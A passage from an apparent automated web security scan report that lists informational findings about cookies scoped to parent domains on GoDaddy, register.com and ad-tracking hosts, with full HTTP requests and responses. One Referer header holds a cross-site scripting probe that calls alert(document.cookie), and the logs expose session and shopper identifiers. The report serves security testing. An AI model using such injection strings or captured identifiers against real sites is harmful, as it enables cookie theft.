10.38. https://idp.godaddy.com/retrieveaccount.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://idp.godaddy.com
Path:	/retrieveaccount.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 04-Sep-2012 00:27:41 GMT; path=/
flag1=cflag=us; domain=godaddy.com; expires=Tue, 04-Sep-2012 00:27:41 GMT; path=/
traffic=cookies=1&referrer=http://www.godaddy.com/affiliates/affiliate-program.aspx&sitename=www.godaddy.com&page=/shared/video/videos.aspx&server=M1PWCORPWEB101&status=200 OK&querystring=ci=22398&show_vid=affiliatesproductoverview&pagetype=affiliate&callback=popUpFill&targetDivId=quickTourDiv&popUpFill=jsonp1315095995209&_=1315096014458%26hpGoogleStatic%3d1&shopper=46215684&privatelabelid=1&isc="&clientip=50.23.123.106&referringpath=a1743495-9530-4d25-a9ca-bb977519280d&referringdomain=&split=13; domain=godaddy.com; path=/
traffic=cookies=1&referrer=http://www.godaddy.com/affiliates/affiliate-program.aspx&sitename=www.godaddy.com&page=/shared/video/videos.aspx&server=M1PWCORPWEB101&status=200 OK&querystring=ci=22398&show_vid=affiliatesproductoverview&pagetype=affiliate&callback=popUpFill&targetDivId=quickTourDiv&popUpFill=jsonp1315095995209&_=1315096014458%26hpGoogleStatic%3d1&shopper=46215684&privatelabelid=1&isc="&clientip=50.23.123.106&referringpath=a1743495-9530-4d25-a9ca-bb977519280d&referringdomain=&split=13; domain=godaddy.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /retrieveaccount.aspx?ci=9107&spkey=GDSWNET-M1PWCORPWEB101 HTTP/1.1
Host: idp.godaddy.com
Connection: keep-alive
Referer: https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB101&target=http%3A%2F%2Fwww.godaddy.com%2Faffiliates%2Faffiliate-program.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flag1=cflag=us; currencypopin1=cdisplaypopin=false; SplitValue1=24; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; domainYardVal=%2D1; serverVersion=A; preferences1=_sid=yishkaeegbnbqewgxixgkfpfeekbejsf&dataCenterCode=US&gdshop_currencyType=USD; BlueLithium_ssl=hbuftbbciczbydeibifgffggtihijizc; ASP.NET_SessionId=pwylm3umzkrcsc3bnf5ymbnz; pathway=4f057259-4645-4223-96aa-98d6262a1c68; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; ShopperId1=oemhlbvbcgufsjahmchddfndphwizcii; pagecount=3; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; adc1=US; currency1=potableSourceStr=USD; traffic=

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:27:41 GMT
Server: Microsoft-IIS/6.0
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 04-Sep-2012 00:27:41 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 04-Sep-2012 00:27:41 GMT; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: traffic=cookies=1&referrer=http://www.godaddy.com/affiliates/affiliate-program.aspx&sitename=www.godaddy.com&page=/shared/video/videos.aspx&server=M1PWCORPWEB101&status=200 OK&querystring=ci=22398&show_vid=affiliatesproductoverview&pagetype=affiliate&callback=popUpFill&targetDivId=quickTourDiv&popUpFill=jsonp1315095995209&_=1315096014458%26hpGoogleStatic%3d1&shopper=46215684&privatelabelid=1&isc="&clientip=50.23.123.106&referringpath=a1743495-9530-4d25-a9ca-bb977519280d&referringdomain=&split=13; domain=godaddy.com; path=/
Set-Cookie: traffic=cookies=1&referrer=http://www.godaddy.com/affiliates/affiliate-program.aspx&sitename=www.godaddy.com&page=/shared/video/videos.aspx&server=M1PWCORPWEB101&status=200 OK&querystring=ci=22398&show_vid=affiliatesproductoverview&pagetype=affiliate&callback=popUpFill&targetDivId=quickTourDiv&popUpFill=jsonp1315095995209&_=1315096014458%26hpGoogleStatic%3d1&shopper=46215684&privatelabelid=1&isc="&clientip=50.23.123.106&referringpath=a1743495-9530-4d25-a9ca-bb977519280d&referringdomain=&split=13; domain=godaddy.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 97068

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="https:/
...[SNIP]...

10.39. http://image2.pubmatic.com/AdServer/Pug previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://image2.pubmatic.com
Path:	/AdServer/Pug

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PUBRETARGET=78_1409703834; domain=pubmatic.com; expires=Wed, 03-Sep-2014 00:23:54 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTc4JnRsPTE1NzY4MDA=&piggybackCookie=uid:6422714091563403120 HTTP/1.1
Host: image2.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://www.cheapssls.com/index.php?status=A&pshort=Y&pfull=Y&pname=Y&pkeywords=Y&search_performed=Y&cid=0&q=xss&x=0&y=0&dispatch=products.search&features_hash=P14
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:23:54 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: PUBRETARGET=78_1409703834; domain=pubmatic.com; expires=Wed, 03-Sep-2014 00:23:54 GMT; path=/
Content-Length: 42
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D.;

10.40. http://img.godaddy.com/image.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://img.godaddy.com
Path:	/image.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

actioncount=22804%0d%0aa0acc03b446; domain=.godaddy.com; path=/
app_pathway=38ba47e3b0f3e75ec51f0668; domain=.godaddy.com; path=/
visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; domain=.godaddy.com; expires=Sun, 02-Sep-2012 21:49:36 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /image.aspx?sitename=www.godaddy.com&server=M1PWCORPWEB109&shopper=46215684&privatelabelid=1&status=200&rand=0.781776874690213&page=%2fssl%2fssl-certificates.aspx&split=24 HTTP/1.1
Host: img.godaddy.com
Proxy-Connection: keep-alive
Referer: http://www.godaddy.com/ssl/ssl-certificates.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flag1=cflag=us; currencypopin1=cdisplaypopin=false; SplitValue1=24; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; pathway=8d587be0-834e-4a03-83dc-2f3bcb783a40; ShopperId1=yjjjodldcfygaahhseaipjhbleigjbpa; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMinorVer=3&fMajorVer=10&slMajorVer=-1&slMinorVer=-1; pagecount=2; fb_pagecount=2; actioncount=; fb_actioncount=; app_pathway=; fb_session=S_TOUCH=09/03/2011 21:32:13&pathway=8d587be0-834e-4a03-83dc-2f3bcb783a40&V_DATE=09/03/2011 14:28:59; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; domainYardVal=%2D1; serverVersion=A; preferences1=_sid=yishkaeegbnbqewgxixgkfpfeekbejsf&dataCenterCode=US&gdshop_currencyType=USD; adc1=US; currency1=potableSourceStr=USD; traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/ssl/ssl-certificates.aspx&server=M1PWCORPWEB109&status=200 OK&querystring=&shopper=46215684&privatelabelid=1&isc=&clientip=50.23.123.106&referringpath=8d587be0-834e-4a03-83dc-2f3bcb783a40&referringdomain=&split=24; BlueLithium_ssl=hbuftbbciczbydeibifgffggtihijizc

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: image/gif
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: pagecount=3; domain=.godaddy.com; path=/
Set-Cookie: fb_pagecount=3; path=/
Set-Cookie: actioncount=22804%0d%0aa0acc03b446; domain=.godaddy.com; path=/
Set-Cookie: fb_actioncount=38ba47e39a3cd44efaca8d89; path=/
Set-Cookie: app_pathway=38ba47e3b0f3e75ec51f0668; domain=.godaddy.com; path=/
Set-Cookie: fb_session=S_TOUCH=09/03/2011 21:49:36&pathway=8d587be0-834e-4a03-83dc-2f3bcb783a40&V_DATE=09/03/2011 14:28:5938ba47e368c05affcb2650a6; path=/
Set-Cookie: isc="; domain=.godaddy.com; path=/
Set-Cookie: visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; domain=.godaddy.com; expires=Sun, 02-Sep-2012 21:49:36 GMT; path=/
Set-Cookie: traffic=; domain=.godaddy.com; path=/
X-Powered-By: ASP.NET
P3P: CP=IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA
Date: Sat, 03 Sep 2011 21:49:36 GMT
Content-Length: 43

GIF89a.............!.......,...........D..;

10.41. http://img.godaddy.com/pageevents.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://img.godaddy.com
Path:	/pageevents.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

actioncount=22804%0d%0aa0acc03b446; domain=.godaddy.com; path=/
app_pathway=38ba47e3b0f3e75ec51f0668; domain=.godaddy.com; path=/
visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; domain=.godaddy.com; expires=Sun, 02-Sep-2012 21:49:50 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pageevents.aspx?page_name=/ssl/ssl-certificates.aspx&ci=15014&eventtype=&ciimpressions=&usrin=&r=0.6363521805033088&comview=0 HTTP/1.1
Host: img.godaddy.com
Proxy-Connection: keep-alive
Referer: http://www.godaddy.com/ssl/ssl-certificates.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flag1=cflag=us; currencypopin1=cdisplaypopin=false; SplitValue1=24; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; pathway=8d587be0-834e-4a03-83dc-2f3bcb783a40; ShopperId1=yjjjodldcfygaahhseaipjhbleigjbpa; pagecount=2; fb_pagecount=2; actioncount=; fb_actioncount=; app_pathway=; fb_session=S_TOUCH=09/03/2011 21:32:13&pathway=8d587be0-834e-4a03-83dc-2f3bcb783a40&V_DATE=09/03/2011 14:28:59; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; domainYardVal=%2D1; serverVersion=A; preferences1=_sid=yishkaeegbnbqewgxixgkfpfeekbejsf&dataCenterCode=US&gdshop_currencyType=USD; adc1=US; currency1=potableSourceStr=USD; traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/ssl/ssl-certificates.aspx&server=M1PWCORPWEB109&status=200 OK&querystring=&shopper=46215684&privatelabelid=1&isc=&clientip=50.23.123.106&referringpath=8d587be0-834e-4a03-83dc-2f3bcb783a40&referringdomain=&split=24; BlueLithium_ssl=hbuftbbciczbydeibifgffggtihijizc; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: image/gif
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: pagecount=15; domain=.godaddy.com; path=/
Set-Cookie: fb_pagecount=15; path=/
Set-Cookie: actioncount=22804%0d%0aa0acc03b446; domain=.godaddy.com; path=/
Set-Cookie: fb_actioncount=38ba47e39a3cd44efaca8d89; path=/
Set-Cookie: app_pathway=38ba47e3b0f3e75ec51f0668; domain=.godaddy.com; path=/
Set-Cookie: fb_session=S_TOUCH=09/03/2011 21:49:49&pathway=8d587be0-834e-4a03-83dc-2f3bcb783a40&V_DATE=09/03/2011 14:28:5938ba47e368c05affcb2650a6; path=/
Set-Cookie: isc="; domain=.godaddy.com; path=/
Set-Cookie: visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; domain=.godaddy.com; expires=Sun, 02-Sep-2012 21:49:50 GMT; path=/
X-Powered-By: ASP.NET
P3P: CP=IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA
Date: Sat, 03 Sep 2011 21:49:50 GMT
Content-Length: 43

GIF89a.............!.......,...........D..;

10.42. http://m.adnxs.com/msftcookiehandler previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://m.adnxs.com
Path:	/msftcookiehandler

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uuid2=6422714091563403120; path=/; expires=Fri, 02-Dec-2011 21:38:27 GMT; domain=.adnxs.com; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /msftcookiehandler?t=1&c=MUID%3d9FA60E9E25934DD3BB2BBC07F1AAFA23 HTTP/1.1
Host: m.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.cheapssls.com/geotrust-ssl-certificates/quickssl-premium.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; sess=1; uuid2=6422714091563403120; anj=Kfu=8fG10Qcvjr/?0P(*AuB-u**g1:XICjmEi'/29uJ21V.fsQSr=z6NGgptu>0_YXw_T%?9*a5p4!1-waB6<#uuy!Q#lx*XEB@`D:dkd7>T]xMWu7a9T1Y1.^NXLlK839uon7j94%gch60)-@(Z_[!1jn1vzCbx

Response

10.43. https://mya.godaddy.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mya.godaddy.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ShopperId1=mcjidfagdephnjweyclebfehyathlbaj; domain=godaddy.com; expires=Sat, 04-Sep-2021 00:28:34 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: mya.godaddy.com
Connection: keep-alive
Referer: https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB109&target=http%3A%2F%2Fwww.godaddy.com%2Fssl%2Fssl-certificates.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flag1=cflag=us; currencypopin1=cdisplaypopin=false; SplitValue1=24; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; ShopperId1=yjjjodldcfygaahhseaipjhbleigjbpa; domainYardVal=%2D1; serverVersion=A; preferences1=_sid=yishkaeegbnbqewgxixgkfpfeekbejsf&dataCenterCode=US&gdshop_currencyType=USD; BlueLithium_ssl=hbuftbbciczbydeibifgffggtihijizc; adc1=US; currency1=potableSourceStr=USD; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pathway=4f057259-4645-4223-96aa-98d6262a1c68; pagecount=1; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; traffic=

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 00:28:34 GMT
Server: Microsoft-IIS/6.0
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: https://idp.godaddy.com/login.aspx?SPKey=GDMYA-M1PWMYAWEB006&redirect=true&myaurl=%2fdefault.aspx
Set-Cookie: ShopperId1=mcjidfagdephnjweyclebfehyathlbaj; domain=godaddy.com; expires=Sat, 04-Sep-2021 00:28:34 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 222

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://idp.godaddy.com/login.aspx?SPKey=GDMYA-M1PWMYAWEB006&redirect=true&myaurl=%2fdefault.aspx">here</a>.<
...[SNIP]...

10.44. https://mya.godaddy.com/products/accountlist.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mya.godaddy.com
Path:	/products/accountlist.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ShopperId1=fhvekhlijizajdrfuatbuisjhckdhiwb; domain=godaddy.com; expires=Sat, 04-Sep-2021 00:26:13 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /products/accountlist.aspx HTTP/1.1
Host: mya.godaddy.com
Connection: keep-alive
Referer: https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB109&target=http%3A%2F%2Fwww.godaddy.com%2Fssl%2Fssl-certificates.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flag1=cflag=us; currencypopin1=cdisplaypopin=false; SplitValue1=24; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; pathway=8d587be0-834e-4a03-83dc-2f3bcb783a40; ShopperId1=yjjjodldcfygaahhseaipjhbleigjbpa; domainYardVal=%2D1; serverVersion=A; preferences1=_sid=yishkaeegbnbqewgxixgkfpfeekbejsf&dataCenterCode=US&gdshop_currencyType=USD; BlueLithium_ssl=hbuftbbciczbydeibifgffggtihijizc; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pagecount=2; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; adc1=US; currency1=potableSourceStr=USD; traffic=

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 00:26:13 GMT
Server: Microsoft-IIS/6.0
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: https://idp.godaddy.com/login.aspx?SPKey=GDMYA-M1PWMYAWEB006&redirect=false&myaurl=%2fproducts%2faccountlist.aspx
Set-Cookie: ShopperId1=fhvekhlijizajdrfuatbuisjhckdhiwb; domain=godaddy.com; expires=Sat, 04-Sep-2021 00:26:13 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 238

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://idp.godaddy.com/login.aspx?SPKey=GDMYA-M1PWMYAWEB006&redirect=false&myaurl=%2fproducts%2faccountlist.
...[SNIP]...

10.45. http://oascentral.register.com/RealMedia/ads/adstream_mjx.ads/register.com/index/1269119279@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.register.com
Path:	/RealMedia/ads/adstream_mjx.ads/register.com/index/1269119279@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

OAX=Mhd7ak5indMAAU0C; expires=Tue, 03-Sep-13 21:36:19 GMT; path=/; domain=.register.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/register.com/index/1269119279@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom? HTTP/1.1
Host: oascentral.register.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.register.com/font41cfd%22%3balert(document.cookie)//a7bdf3e7ba5/vag-bold.ttf
Cookie: TLTSID=BEBCC488D67410D6177BEE195E4E2E9D; mbox=check#true#1315085873|session#1315085812182-148030#1315087673|PC#1315085812182-148030.19#1317677814

Response

10.46. http://oascentral.register.com/RealMedia/ads/adstream_mjx.ads/register.com/viewproductdetail/getadomain/1680914497@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.register.com
Path:	/RealMedia/ads/adstream_mjx.ads/register.com/viewproductdetail/getadomain/1680914497@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

OAX=Mhd7ak5inIsACxRd; expires=Tue, 03-Sep-13 21:30:51 GMT; path=/; domain=.register.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/register.com/viewproductdetail/getadomain/1680914497@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom? HTTP/1.1
Host: oascentral.register.com
Proxy-Connection: keep-alive
Referer: http://www.register.com/domain/searchresults.rcmx?webmetrics=null&searchOrigin=homepage&domain=xss&selectedTLDs=.com&x=0&y=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=C8693DAAD67310D60E179E16E4910D7E; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=195431987.824255109.1315085416.1315085416.1315085416.1; __utmb=195431987.1.10.1315085416; __utmc=195431987; __utmz=195431987.1315085416.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|27314E20051D1798-6000010600062C35[CE]; mbox=session#1315085400638-452340#1315087347|PC#1315085400638-452340.19#1317677487|check#true#1315085547

Response

10.47. http://pixel.adblade.com/imps.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.adblade.com
Path:	/imps.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

__sgs=9H1OEBpHJTWK0eUV1IWqNKX4KF4U8ibH6Zl%2FNq6xhhI%3D; expires=Sun, 02-Sep-2012 21:40:32 GMT; path=/; domain=.adblade.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /imps.php?sgms=38 HTTP/1.1
Host: pixel.adblade.com
Proxy-Connection: keep-alive
Referer: http://login.dotomi.com/ucm/UCMController?dtm_com=28&dtm_fid=101&dtm_cid=2304&dtm_cmagic=e6c2dc&dtm_format=5&cli_promo_id=4&dtm_user_id=&dtmc_user_type=NEW&dtmc_product_type=Domain&dtmc_product_id=TTN%3A%20Domains%3A%20Search%3A%20Taken&dtmc_domain_name=xss.com&dtm_items=&dtmc_domain_status=TAKEN&dtmc_domain_variations=xss.la&dtmc_source=WWW000000000W&dtmc_ref=http%3A//www.register.com/&dtmc_loc=http%3A//www.register.com/domain/searchresults.rcmx%3Fwebmetrics%3Dnull%26searchOrigin%3Dhomepage%26domain%3Dxss%26selectedTLDs%3D.com%26x%3D0%26y%3D0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.8
P3P: policyref="http://adblade.com/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Vendor: W3matter LLC | RevSense | http://www.w3matter.com
Set-Cookie: __sgs=9H1OEBpHJTWK0eUV1IWqNKX4KF4U8ibH6Zl%2FNq6xhhI%3D; expires=Sun, 02-Sep-2012 21:40:32 GMT; path=/; domain=.adblade.com
Content-type: image/gif;
Date: Sat, 03 Sep 2011 21:40:32 GMT
Server: lighttpd/1.4.21
Content-Length: 43

GIF89a.............!.......,...........D..;

10.48. http://pixel.mathtag.com/event/img previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.mathtag.com
Path:	/event/img

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ts=1315061039; domain=.mathtag.com; path=/; expires=Sun, 02-Sep-2012 14:43:59 GMT
mt_mop=10008:1315061039|5:1315061038|10002:1313678517|4:1313678521|10001:1312768945; domain=.mathtag.com; path=/; expires=Mon, 03-Oct-2011 14:43:59 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /event/img?mt_id=108043&mt_adid=111&v1=&v2=&v3=&s1=&s2=&s3= HTTP/1.1
Host: pixel.mathtag.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.omniture.com/en/
Cookie: uuid=4e394470-3e17-879f-6d77-411115d4b5ad; ts=1315061012; mt_mop=4:1313678521|10001:1312768945|10002:1313678517|13:1312375922

Response

HTTP/1.1 302 Found
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 pao-pixel-x4 pid 0x7f39 32569
Cache-Control: no-cache
Content-Type: image/gif
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Date: Sat, 03 Sep 2011 14:43:59 GMT
Location: http://loadm.exelator.com/load/?p=204&g=101&buid=4e394470-3e17-879f-6d77-411115d4b5ad&j=0
Connection: Keep-Alive
Set-Cookie: ts=1315061039; domain=.mathtag.com; path=/; expires=Sun, 02-Sep-2012 14:43:59 GMT
Set-Cookie: mt_mop=10008:1315061039|5:1315061038|10002:1313678517|4:1313678521|10001:1312768945; domain=.mathtag.com; path=/; expires=Mon, 03-Oct-2011 14:43:59 GMT
Content-Length: 43

GIF89a.............!.......,...........D..;

10.49. http://pixel.mathtag.com/event/js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.mathtag.com
Path:	/event/js

Issue detail

